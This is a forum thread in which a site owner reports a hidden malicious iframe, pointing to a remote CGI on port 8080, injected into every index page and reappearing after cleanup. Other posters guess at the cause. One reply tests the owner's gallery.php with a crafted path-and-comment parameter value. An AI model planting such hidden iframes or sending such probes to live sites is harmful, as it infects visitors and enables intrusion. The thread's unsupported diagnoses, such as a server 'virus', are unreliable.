Site hacked, a few questions!

[Agtronic]

Hey guys and gals,

 

My website was recently modified by an outside source, and I'm not sure how it was done.

 

Basically, the following code was added right after the <body> tag in every index file on the site.

 

<iframe src="http:// aamane06.isa-geek.com: 8080/ts/ in.cgi?open3" width=574 height=0 style="visibility: hidden"></iframe>

 

(I added some spaces in there so no one clicks on it).

 

This is about the only thing I have been able to find : http://forum.joomla.org/viewtopic.php?f=432&t=438367

 

Anyone else seen this?

 

I'm wondering if anyone has any tips on how I can prevent this from happening in the future. I don't have any real fancy scripting on the website, other than a few forms to gather email addresses and such, but every input is filtered before being processed.

 

Any insight?

 

Thanks!

 

Oh, and the website in question : http://www.agtronicmotorsport.com

[The Little Guy]

I had a hosting company that was hacked through a bad version of cpanel.... maybe your same problem?

[xcoderx]

the host machine got virus 

[khr2003]

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved .

 

[PugJr]

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved .

 

I don't quite understand that. Why would it matter the password? Either way your server provider knows the password so how would it prevent them or the hacker of the server to modifiy your file pages?

[Agtronic]

It keeps happening over and over. I fix the site and the problem comes back a few days later! It's driving me crazy!

[Agtronic]

I change all my passwords, and did everything I could think of, including completely re-uploading a clean source for the website. A few days later, it happened again.

[xylex]

The issue probably going to be either your host is vulnerable and someone is able to mess with other user's files on the server, or your script is vulnerable.

 

One possible place for the latter, am I unfiltered in your command line here?

 

http://www.agtronicmotorsport.com/gallery.php?action=view&gallery=18257fb6a5f3e735

 

http://www.agtronicmotorsport.com/gallery.php?action=view&gallery=./18257fb6a5f3e735%20#comment

[khr2003]

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved .

 

I don't quite understand that. Why would it matter the password? Either way your server provider knows the password so how would it prevent them or the hacker of the server to modifiy your file pages?

 

IF you do not trust you host provider why host with them at the first place. The problem is that the servers are compromised, so to prevent someone else on hosting his files on the same server to hack or identity your password you have to change your password to a very lengthy complicated one.

[xcoderx]

Guys its the virus nobody is hacking his site i know coz my mate had same issue and the host server machine had some kinda virus the modifies html, php etc files.